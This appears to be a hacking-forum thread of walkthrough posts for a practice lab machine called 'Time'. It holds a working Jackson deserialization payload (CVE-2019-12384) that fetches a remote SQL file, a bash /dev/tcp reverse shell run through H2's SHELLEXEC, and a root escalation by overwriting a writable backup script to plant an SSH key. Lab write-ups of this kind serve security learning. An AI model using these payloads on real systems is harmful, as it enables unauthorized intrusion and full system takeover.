TUTORIAL Time Tutorial
by southerndarkness - October 25, 2020 at 02:55 AM
#1
- port scan to reveal ports 22, 80
- port 80 shows form that acts as formatter/validator
- entering "test" and selecting validator (betas) shows the processor used - fasterxml/jackson
- CVE-2019-12384 (https://github.com/jas502n/CVE-2019-12384)
- create and serve a local sql file that shellexec's a reverse shell back to you
- in the form, pass in json that downloads the sql file you created (see the repo for the payload)
- as user, enumerate with linpeas you'll see timer_backup.sh is writable - overwrite this file to put your public key in root's authorized keys
- ssh in as root
#2
(October 25, 2020 at 02:55 AM)southerndarkness Wrote: - port scan to reveal ports 22, 80
- port 80 shows form that acts as formatter/validator
- entering "test" and selecting validator (betas) shows the processor used - fasterxml/jackson
- CVE-2019-12384 (https://github.com/jas502n/CVE-2019-12384)
- create and serve a local sql file that shellexec's a reverse shell back to you
- in the form, pass in json that downloads the sql file you created (see the repo for the payload)
- as user, enumerate with linpeas you'll see timer_backup.sh is writable - overwrite this file to put your public key in root's authorized keys
- ssh in as root


can't replace url in the payload
getting error:Unexpected character (''' (code 39)): expected a valid value (number, String, array, object, 'true', 'false' or 'null')

(October 25, 2020 at 08:15 AM)Zxelex Wrote:
(October 25, 2020 at 02:55 AM)southerndarkness Wrote: - port scan to reveal ports 22, 80
- port 80 shows form that acts as formatter/validator
- entering "test" and selecting validator (betas) shows the processor used - fasterxml/jackson
- CVE-2019-12384 (https://github.com/jas502n/CVE-2019-12384)
- create and serve a local sql file that shellexec's a reverse shell back to you
- in the form, pass in json that downloads the sql file you created (see the repo for the payload)
- as user, enumerate with linpeas you'll see timer_backup.sh is writable - overwrite this file to put your public key in root's authorized keys
- ssh in as root


can't replace url in the payload
getting error:Unexpected character (''' (code 39)): expected a valid value (number, String, array, object, 'true', 'false' or 'null')




can you post the payload that worked for you. That would be helpful .
#3
Ok i will explain

So in the public exploit they do it on localhost so the request for them is like :
jruby test.rb "[\"ch.qos.logback.core.db.DriverManagerConnectionSource\", {\"url\":\"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://localhost:8000/inject.sql'\"}]"

----------------------------------------------------------------------------------------------------
For us what we need to put in the validator is :

["ch.qos.logback.core.db.DriverManagerConnectionSource", {"url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://YOUR_IP:8000/inject.sql'"}]

I had to remove the "\" because they gave java errors

-------------------------------------------------------------------------------

Also in the inject.sql instead of "id" command we can put bash reverse shell 

the one that worked perfectly is
bash -i >& /dev/tcp/MY_IP/9999 0>&1

so the last lines of injection.sql
should look like 

CALL SHELLEXEC('bash -i >& /dev/tcp/MY_IP/9999 0>&1')

Then you will get a shell as the user.
#4
(October 25, 2020 at 12:12 PM)chernakotka Wrote: Ok i will explain

So in the public exploit they do it on localhost so the request for them is like :
jruby test.rb "[\"ch.qos.logback.core.db.DriverManagerConnectionSource\", {\"url\":\"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://localhost:8000/inject.sql'\"}]"

----------------------------------------------------------------------------------------------------
For us what we need to put in the validator is :

["ch.qos.logback.core.db.DriverManagerConnectionSource", {"url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://YOUR_IP:8000/inject.sql'"}]

I had to remove the "\" because they gave java errors

-------------------------------------------------------------------------------

Also in the inject.sql instead of "id" command we can put bash reverse shell 

the one that worked perfectly is
bash -i >& /dev/tcp/MY_IP/9999 0>&1

so the last lines of injection.sql
should look like 

CALL SHELLEXEC('bash -i >& /dev/tcp/MY_IP/9999 0>&1')

Then you will get a shell as the user.

This ^^^
The payload in the repo is escaped. Removing the backslashes and putting them in the form will get it to download your sql.
#5
(October 25, 2020 at 12:12 PM)chernakotka Wrote: Ok i will explain

So in the public exploit they do it on localhost so the request for them is like :
jruby test.rb "[\"ch.qos.logback.core.db.DriverManagerConnectionSource\", {\"url\":\"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://localhost:8000/inject.sql'\"}]"

----------------------------------------------------------------------------------------------------
For us what we need to put in the validator is :

["ch.qos.logback.core.db.DriverManagerConnectionSource", {"url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://YOUR_IP:8000/inject.sql'"}]

I had to remove the "\" because they gave java errors

-------------------------------------------------------------------------------

Also in the inject.sql instead of "id" command we can put bash reverse shell 

the one that worked perfectly is
bash -i >& /dev/tcp/MY_IP/9999 0>&1

so the last lines of injection.sql
should look like 

CALL SHELLEXEC('bash -i >& /dev/tcp/MY_IP/9999 0>&1')

Then you will get a shell as the user.


Thnx man it worked for me and nice explanation.

(October 25, 2020 at 10:30 PM)southerndarkness Wrote:
(October 25, 2020 at 12:12 PM)chernakotka Wrote: Ok i will explain

So in the public exploit they do it on localhost so the request for them is like :
jruby test.rb "[\"ch.qos.logback.core.db.DriverManagerConnectionSource\", {\"url\":\"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://localhost:8000/inject.sql'\"}]"

----------------------------------------------------------------------------------------------------
For us what we need to put in the validator is :

["ch.qos.logback.core.db.DriverManagerConnectionSource", {"url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://YOUR_IP:8000/inject.sql'"}]

I had to remove the "\" because they gave java errors

-------------------------------------------------------------------------------

Also in the inject.sql instead of "id" command we can put bash reverse shell 

the one that worked perfectly is
bash -i >& /dev/tcp/MY_IP/9999 0>&1

so the last lines of injection.sql
should look like 

CALL SHELLEXEC('bash -i >& /dev/tcp/MY_IP/9999 0>&1')

Then you will get a shell as the user.

This ^^^
The payload in the repo is escaped. Removing the backslashes and putting them in the form will get it to download your sql.

Thnx man love your mini-writeup on the box directly on point.
#6
how did you find the github cve?
#7
(October 26, 2020 at 11:34 AM)Saexlean Wrote: how did you find the github cve?

because when you go to the website it tells json beautifier .So it expects us to give it json format .
And you see it has 2 options :beautify and validate.
So if you put in the validate lets say i json
{"junk":"junk"} it says 

Validation failed: Unhandled Java exception:....and so on

and if you see it errors on the fasterxml so when you google in the end you will end up with that article 
https://blog.doyensec.com/2019/07/22/jac...dgets.html

and the CVE .
#8
Nicely done ...

The cron job was killing my root shell ... the overwrite of root pub key is a much better option !
#9
can you explain a bit in-dept about the 2nd process

Possibly Related Threads…
Thread Author Replies Views Last Post
TUTORIAL HTB Time walkthrough orangutang 0 98 8 hours ago
Last Post: orangutang
TUTORIAL Apt tutorial FREE mrleetx 75 13,317 December 01, 2020 at 11:47 PM
Last Post: bodiesplus
TUTORIAL Luanne Tutorial/Discussion southerndarkness 33 4,359 December 01, 2020 at 09:07 PM
Last Post: tutyfruty

 Users browsing this thread: 1 Guest(s)